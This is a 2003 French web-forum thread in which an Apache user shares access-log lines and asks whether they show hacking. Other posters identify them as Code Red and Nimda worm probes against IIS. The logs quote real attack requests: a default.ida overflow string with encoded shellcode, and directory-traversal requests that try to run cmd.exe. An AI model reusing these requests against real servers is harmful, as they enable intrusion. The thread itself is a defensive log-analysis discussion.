Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
3065 connectés 

  FORUM HardWare.fr
  Programmation
  PHP

  [ Appache ] Question sur le acces.log

 
 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

[ Appache ] Question sur le acces.log

n°397535
j-'-r
Sans horraires fixe
Posté le 16-05-2003 à 21:14:38  profilanswer
 

213.36.197.201
[27/Apr/2003:13:55:35 +0200]
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0"
403
312


j'ai ca dans mon log "acces" parmis tous les ips local ( 127.0.0.1 )  
il apparait 2, 3 fois avec des ips differents ( mais pas local )
alors que mon serveur est privé...
 
piratage ? spy ?

mood
Publicité
Posté le 16-05-2003 à 21:14:38  profilanswer
 

n°397540
j-'-r
Sans horraires fixe
Posté le 16-05-2003 à 21:18:40  profilanswer
 

213.36.137.68 - - [16/May/2003:00:38:17 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 317
213.36.137.68 - - [16/May/2003:00:38:25 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 315
213.36.137.68 - - [16/May/2003:00:38:33 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325
213.36.137.68 - - [16/May/2003:00:38:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325
213.36.137.68 - - [16/May/2003:00:38:49 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339
213.36.137.68 - - [16/May/2003:00:38:57 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 356
213.36.137.68 - - [16/May/2003:00:39:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 356
213.36.137.68 - - [16/May/2003:00:39:12 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 372
213.36.137.68 - - [16/May/2003:00:39:20 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
213.36.137.68 - - [16/May/2003:00:39:28 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
213.36.137.68 - - [16/May/2003:00:39:37 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
213.36.137.68 - - [16/May/2003:00:39:44 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 338
213.36.137.68 - - [16/May/2003:00:39:53 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318
213.36.137.68 - - [16/May/2003:00:40:00 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318
213.36.137.68 - - [16/May/2003:00:40:08 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339
213.36.137.68 - - [16/May/2003:00:40:16 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 339

 
ca, c'est sur c'est une tentative de hack :D

n°397544
kadreg
profil: Utilisateur
Posté le 16-05-2003 à 21:21:28  profilanswer
 

J-'-R a écrit :


ca, c'est sur c'est une tentative de hack :D


 
Mais non, c'est des IIS vérolés qui cherchent à se reproduire.
 
 
 


rincevent:/home/kadreg# grep cmd.exe /etc/apache/logs/default-access_log | wc -l
 121421
rincevent:/home/kadreg# grep default.ida /etc/apache/logs/default-access_log | wc -l
   2098
rincevent:/home/kadreg#
 


---------------
brisez les rêves des gens, il en restera toujours quelque chose...  -- laissez moi troller sur discu !
n°397546
j-'-r
Sans horraires fixe
Posté le 16-05-2003 à 21:24:56  profilanswer
 

HotShot a écrit :

Nope, c simplement un énième ver (Nimda, Codered etc.) qui balance une requète sur plein d'IPs, et c tombé sur la tienne par hasard à un moment...  
 
Tu risques aussi de voir apparaitre des GET cmd.exe etc.
 
De toute façon, ça n'attaque que les serveurs à base de Microsoft, donc pas de panique. A part remplir ton log d'erreurs 404, ca fera rien :p


ok parfait, je me suis inquiété pour rien... et tu m a grillé sur ma question suivante :D

n°397549
j-'-r
Sans horraires fixe
Posté le 16-05-2003 à 21:29:14  profilanswer
 

[Fri May 02 12:59:44 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/c
[Fri May 02 12:59:47 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/d
[Fri May 02 12:59:49 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/scripts
[Fri May 02 12:59:51 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/_vti_bin
[Fri May 02 12:59:53 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/_mem_bin
[Fri May 02 12:59:55 2003] [error] [client 81.191.53.100] client denied by server configuration: g:/mes sites web/msadc

 
ca c est du hack manuel ? ou vers ?

n°397616
j-'-r
Sans horraires fixe
Posté le 16-05-2003 à 22:29:51  profilanswer
 

:bounce:


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  PHP

  [ Appache ] Question sur le acces.log

 

Sujets relatifs
question sur une horloge en C[VC++] Problème de Rect et de coordonnées...[Solution et Question]
Question con - pb avec free()Question sur Dblookupcombobox de Delphi 5 et SQL server 2000
Petite question Visual Basic (impression)[Delphi] TreeView : question de base....
La question inutile du jourquestion pour des champions, developpement site Web inside !!!
definir les acces aux fichiersacces concurentiel
Plus de sujets relatifs à : [ Appache ] Question sur le acces.log

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo
Page générée en 0.043 secondes

Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR